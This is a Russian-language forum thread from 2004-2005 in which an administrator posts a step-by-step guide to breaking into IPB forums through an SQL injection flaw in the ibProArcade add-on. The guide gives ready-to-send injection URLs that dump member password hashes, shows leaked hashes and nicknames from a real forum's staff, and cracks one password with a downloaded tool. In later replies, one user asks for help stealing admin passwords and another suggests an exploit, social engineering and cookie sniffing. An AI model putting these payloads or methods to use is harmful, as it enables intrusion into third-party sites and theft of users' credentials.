day & night

Ломаем ibProArcade v2.5.x, аля IPB X.X, sql injection
Дата обновления: , перейти к новому сообщению
#1
PRYANIK



Made In Tula
[SoftoRooMTeaM] Group Icon

Группа: Администраторы
Сообщений: 31.372
Регистрация: 22.02.2004
Пользователь №: 7


Респектов: 6432
-----XXXXX
Ломаем ibProArcade v2.5.x, получаем доступ к IPB форуму X.X


1) Поисковичком шарим в инете на наличие нашего объекта внимания

2) Браузером отсылаем такой запрос на его сайт
Если форум на движке ipb 1.x

Цитата | Quote
адресс/index.php?act=Arcade&cat=
-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,
0,0,0,0,0,0,0%20FROM%20ibf_members/*


для IPB 2.x
Цитата | Quote
адресс/index.php?act=Arcade&cat=
-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,
0,0,0,0,0,0%20FROM%20ibf_members/*



Примерчик:
http://www.opresident...0ibf_members/*

• 3) Получаем инфу о всякой "полезной лабуде", а вместе с инфой и все пароли пользователей в хэше...

Пример, всё из того же форума

Начало списка хэша, левый столбец
d224e41e79b73a53dcfa86101256c851 ----пароль админа Ник: Ciccio
99f4b99d10c4d7aa96a5cb18477c70a7 ---пароль СуперМодера Ник: BlackyB


• 4) Качаем эту прожку _http://www.insidepro....sswordspro.zip

• 5) Вбиваем в неё хэшь админа или супра (Из примера, он будет такой, Супра:
Code
99f4b99d10c4d7aa96a5cb18477c70a7
)

• 6) Перебираем...

• 7) Получаем пароль СуперМодера (из примера)
Ник: Нам уже известен BlackyB
Пароль: 270774

• 8) Вводим эти данные, наслаждаймся от части своим форумом...для полного прихватизирования, Вам надо расшифровать пасс админа, а мне было в лом это делать smile.gif


--------------------
Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it!


Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк
User is offline
Go topGo end

Ответов(1 - 9)
4.12.2004 - 17:02
#2
Salavat



Специалист
Group Icon

Группа: Наши Люди
Сообщений: 409
Регистрация: 7.11.2004
Пользователь №: 1.718


Респектов: 23
-----X----
А мне сказали как пофиксить biggrin.gif
User is offline
Go topGo end
8.03.2005 - 21:24
#3
vit_alll



Опытный юзверь
**

Группа: Пользователи
Сообщений: 66
Регистрация: 20.02.2005
Пользователь №: 7.015


Респектов: 0
----------


Предупреждений:

И как пофиксить?
User is offline
Go topGo end
8.03.2005 - 22:06
#4
SPiRiT



профи!
Group Icon

Группа: Наши Люди
Сообщений: 1.098
Регистрация: 23.01.2005
Из: Краснодар
Пользователь №: 4.820


Респектов: 51
-----X----
че-то я не понял откуда хеш видеть и вставлять?!
User is offline
Go topGo end
9.03.2005 - 10:27
#5
PRYANIK



Made In Tula
[SoftoRooMTeaM] Group Icon

Группа: Администраторы
Сообщений: 31.372
Регистрация: 22.02.2004
Пользователь №: 7


Респектов: 6432
-----XXXXX
vit_alll, отключить категории

spark, после того как введёшь правильно ссылку, то всё сразу станет понятно...

P.S Сайт-пример уже не работает, ищите новый smile.gif...


--------------------
Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it!


Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк
User is offline
Go topGo end
9.03.2005 - 11:36
#6
SPiRiT



профи!
Group Icon

Группа: Наши Люди
Сообщений: 1.098
Регистрация: 23.01.2005
Из: Краснодар
Пользователь №: 4.820


Респектов: 51
-----X----
ну зашел, отобразилась обычная аркада и все!
User is offline
Go topGo end
9.03.2005 - 12:00
#7
PRYANIK



Made In Tula
[SoftoRooMTeaM] Group Icon

Группа: Администраторы
Сообщений: 31.372
Регистрация: 22.02.2004
Пользователь №: 7


Респектов: 6432
-----XXXXX
значит на форуме уже пофиксили...ищи другой.

Баг сам по себе уже старый, многие о нём знают и приняли меры...


--------------------
Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it!


Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк
User is offline
Go topGo end
10.08.2005 - 14:42
#8
Сделано в СССР



Грамотный
Group Icon

Группа: Наши Люди
Сообщений: 289
Регистрация: 23.06.2005
Из: Moskau (UdSSR)
Пользователь №: 24.767


Респектов: 28
-----X----
Интересно, а здесь кто-нть ломал уже IPB форумы?
Мне интересно на одном форуме получить пароли админа и модеров. Просто немножко проучить хотелось людей, крушить им не хочу ничё... Версия 1.3.1 final. Кто знает как?
User is offline
Go topGo end
10.08.2005 - 15:05
#9
SPiRiT



профи!
Group Icon

Группа: Наши Люди
Сообщений: 1.098
Регистрация: 23.01.2005
Из: Краснодар
Пользователь №: 4.820


Респектов: 51
-----X----
Попробуй эксплойтом воспользоваться, который лежит в форуме про сетевую безопасность, а если уже дырку закрыли, применяй соц инженерию и сниффер, так ты сможешь похитеть куки, которые можно расшифровать (в 2.хх расшифровать нельзя)
User is offline
Go topGo end
10.08.2005 - 15:24
#10
Сделано в СССР



Грамотный
Group Icon

Группа: Наши Люди
Сообщений: 289
Регистрация: 23.06.2005
Из: Moskau (UdSSR)
Пользователь №: 24.767


Респектов: 28
-----X----
QUOTE(=SPiRiT= @ 10.08.2005 - 15:05)
Попробуй эксплойтом воспользоваться, который лежит в форуме про сетевую безопасность, а если уже дырку закрыли, применяй соц инженерию и сниффер, так ты сможешь похитеть куки, которые можно расшифровать (в 2.хх расшифровать нельзя)
*


У-у, блин эт сложновато для меня - эт все изучать нада... я ни разу эти дела в глаза не видел и с чем едят не знаю...unsure.gif
Ладно - забыли... huh.gif
User is offline
Go topGo end
Вид темы: [ Линейный ] · Стандартный · Режимы сортировки: [ По возрастанию (0-9) ] · По убыванию (9-0)

 
Topic Options
Сейчас: 29.04.2024 - 13:13
 Мобильная версия | Lite версия
SoftoRooM © 2004-2024